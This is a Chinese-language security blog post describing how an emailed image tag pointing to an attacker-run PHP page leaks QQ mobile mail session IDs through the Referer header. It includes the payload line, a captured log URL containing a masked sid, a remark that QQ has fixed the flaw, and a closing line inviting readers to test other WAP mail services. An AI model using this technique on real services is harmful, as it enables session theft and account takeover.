By 空虚浪子心 http://inbreak.net http://t.qq.com/javasecurity
在《浅谈WAP网站安全》文章中,一直都是保守起见,希望可以抛砖引玉,但是没有啥响应,只好自己拿出来点东西了。本片介绍在我们能插入富文本的地方,获取SID的终极方式。
《浅谈WAP网站安全》文中有以下几点:
友情链接安全问题
用户互动导致SID泄露
UCWEB浏览器自动生成链接功能引起的SID泄露
QQ浏览器自动预读功能引起的SID泄露
可以从顺序看到,攻击从“用户必须手工点一下”到“用户只要看了,就被攻击”,这其实是个漏洞可利用度提升的过程。最最贴心的攻击,就是最后那个,用户体验会很好,但是必须使用特殊的浏览器才行。
从漏洞利用角度,还是有很多东西的,这篇先提一点,图片的src也会自动发referer。
我们还是拿QQ做例子,QQ的手机邮箱,发个邮件给它,我测试,必须使用其他邮箱(比如163)发送邮件才可以。
邮件内容只要有张图片,内容为:
<img src="http://inbreak.net/logo.php"> |
当手机用户打开QQ邮箱后,查看邮件:
左下角有个图片,但是看不到图片内容。
其实图片是假的,是个php,你可以在php文件中获取referer,如果要做的像一点,最好在获取referer后,真的生成一张图片出来。下面是作者从IIS日志中抓到的内容:
http://w34.mail.qq.com/cgi-bin/readmail?sid=XXXXX,4,WWWWWW.&disptype=html&mailid=fdsafdsafdsafdsafdsa_dSaO775lQ12&t=&conv=&p=&cmid= |
只有让浏览器在打开页面的同时,自动发个get出去,才是最快捷的方式。
QQ目前已经修补了这个漏洞。
由于这个漏洞,对无线wap应用打击太大,所以很长时间没拿出来。在作者的blog中,已经把WAP安全的相关内容,都作为了一个分类,便于查找。
http://inbreak.net/archives/category/%E5%8E%9F%E5%88%9B%E6%96%87%E7%AB%A0/wap-security
现在,大家可以去遍历各大无线WAP邮箱了。
0 条评论。